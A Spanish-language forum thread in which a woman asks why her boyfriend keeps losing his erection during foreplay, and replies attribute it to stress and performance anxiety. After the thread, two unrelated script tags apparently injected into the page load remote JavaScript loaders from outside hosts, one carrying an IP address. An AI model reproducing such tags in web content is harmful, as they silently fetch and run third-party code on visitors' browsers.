En los preliminares a mi novio se le sube y se le baja todo el rato. ¿A qué se debe?

Pues la verdad es que estoy bastante preocupada, porque cuando estoy con mi novio en los preliminares se le sube pero en 2 o 3 minutos se le baja la erección y luego se le vuelve a subir pero no del todo y luego a bajar, y cuando la tiene erecta del todo y le hago una paja o una felación noto que se le va bajando y siempre tiene que subirla él haciéndose una paja. La verdad es que nunca hemos mantenido relaciones por el problema ese, o no hay tiempo o se ralla. Yo creo que no le excito:( aunque el me diga que las felaciones las hago genial.

1 respuesta

Respuesta

Pienso que está presionado, cuando le ha pasado una vez, su cerebro tiende a pensar que le va a pasar otra vez, eso le echa para atrás y pierde la erección. Intenta tranquilizarle y hacer las cosas suaves, con tiempo, que salgan solas. No creo que sea un problema de excitación puesto que un hombre a la mínima esta ya bien puesto, creo que es mental..

Yo creo que también es mental... puesto que hay veces que si que se ha excitado muchísimo y no le ha pasado, pero puede que esta vez por la presión del tiempo o que le vuelva a pasar no sé... pero es normal que se le suba y se le baje varias veces?

Muchas gracias, ahora estoy más tranquila ya que antes pensaba que sería yo y entonces las otras veces me ponía muy nerviosa

El estrés afecta mucho. Al igual que a nosotras nos hace cambiar los ciclos menstruales, a ellos les hace tener menos semen, menos presión sanguínea..

Relajaros, intentar tener más tiempo para vosotros dos, lo que siempre funciona es una primera masturbación, cuando un hombre lleva tiempo sin mantener relaciones sexuales, el primer coito siempre es menos duradero que los posteriores.

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BC2F60FC6-789E-4B66-B7EE-CE7F2B7B84D2%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=M%EF%BF%BDstoles&ip=95.122.7.199"></script>